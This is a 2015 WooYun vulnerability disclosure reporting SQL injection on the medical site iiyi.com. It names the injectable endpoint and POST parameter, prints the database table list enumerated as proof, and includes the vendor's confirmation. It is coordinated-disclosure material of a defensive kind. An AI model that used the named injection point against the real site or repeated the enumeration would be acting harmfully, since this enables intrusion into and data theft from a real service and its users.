当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158083

漏洞标题:爱爱医医学网存在sql注入

相关厂商:爱爱医医学网

漏洞作者: んi_Stefen

提交时间:2015-12-04 12:01

修复时间:2016-01-18 15:20

公开时间:2016-01-18 15:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

爱爱医医学网存在sql注入

详细说明:

http://user.iiyi.com:80 随意注册一个账号,登录上挖到sql 注入点url:user.iiyi.com/center/friend/get_relation (post提交参数)fids=*

QQ图片20151202210922.png


漏洞证明:

数据库表
case |
| advertise |
| advertise_static |
| app_access_detail |
| app_access_detail_2015_D |
| app_access_uuid |
| app_activety |
| app_counts |
| app_coupon |
| app_dbversion |
| app_login_faild |
| applica_content |
| applica_dbversion |
| applica_downdetial |
| applica_perdownload |
| applica_sort |
| band_records |
| base_area |
| base_hospital |
| bbs_sphinx |
| beans_order |
| case_admin |
| case_collection |
| case_comment |
| case_comment_support |
| case_icons |
| case_icons_log |
| case_images |
| case_myreply |
| case_noallow |
| company |
| dayly_news |
| disease_tags |
| disease_tags_bingli |
| disease_tags_case |
| disease_tags_collection |
| disease_tags_guide |
| disease_tags_look |
| disease_tags_news |
| disease_tags_posts |
| disease_tags_question |
| disease_tags_sous |
| disease_tags_topic |
| disease_tags_types |
| drug_action |
| drug_comp |
| drug_to_action |
| dynamic_0 |
| dynamic_aboutme_0 |
| dynamic_aboutme_1 |
| dynamic_aboutme_2 |
| dynamic_aboutme_3 |
| dynamic_aboutme_4 |
| dynamic_aboutme_5 |
| dynamic_aboutme_6 |
| dynamic_aboutme_7 |
| dynamic_aboutme_8 |
| dynamic_aboutme_9 |
| dynamic_autoid |
| dynamic_collection |
| dynamic_comment_0 |
| dynamic_friends_0 |
| dynamic_friends_1 |
| dynamic_friends_2 |
| dynamic_friends_3 |
| dynamic_friends_4 |
| dynamic_friends_5 |
| dynamic_friends_6 |
| dynamic_friends_7 |
| dynamic_friends_8 |
| dynamic_friends_9 |
| dynamic_images |
| dynamic_mine_0 |
| dynamic_mine_1 |
| dynamic_mine_2 |
| dynamic_mine_3 |
| dynamic_mine_4 |
| dynamic_mine_5 |
| dynamic_mine_6 |
| dynamic_mine_7 |
| dynamic_mine_8 |
| dynamic_mine_9 |
| dynamic_square |
| dynamic_tiny |
| euids |
| feedback |
| flash |
| flash_collection |
| flash_comment |
| flash_comment_support |
| flash_images |
| flash_sort |
| guide |
| guide_collection |
| home_access |
| hotmed |
| it_collect |
| it_comment |
| it_images |
| it_topic |
| literature |
| literature_sort |
| member_base |
| member_bbs_signin |
| member_beans_detial |
| member_beans_tran_log |
| member_black |
| member_certification |
| member_certification_ask |
| member_groups |
| member_image |
| member_invite_mobile |
| member_invitecode |
| member_perfection |
| member_relation |
| member_signin_detail |
| pms_detail |
| pms_relation |
| posts |
| site_var |
| sphinx_counter |
| sysnotice |
| sysnotice_mine_0 |
| sysnotice_mine_1 |
| sysnotice_mine_2 |
| sysnotice_mine_3 |
| sysnotice_mine_4 |
| sysnotice_mine_5 |
| sysnotice_mine_6 |
| sysnotice_mine_7 |
| sysnotice_mine_8 |
| sysnotice_mine_9 |
| thread_support |
| threads |
| topic |
| topic_collection |
| topic_comment |
| topic_comment_support |
| topic_images |
| topic_myreply |
| tupu |
| tupu_class |
| tupu_class_copy |
| tupu_class_type |
| tupu_copy |
| tupu_images |
+--------------------------+
挺多信息,不一一爬了。

QQ图片20151203202159.png


修复方案:

过滤

版权声明:转载请注明来源 んi_Stefen@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-04 15:17

厂商回复:

感谢,已经确认,安排人处理

最新状态:

暂无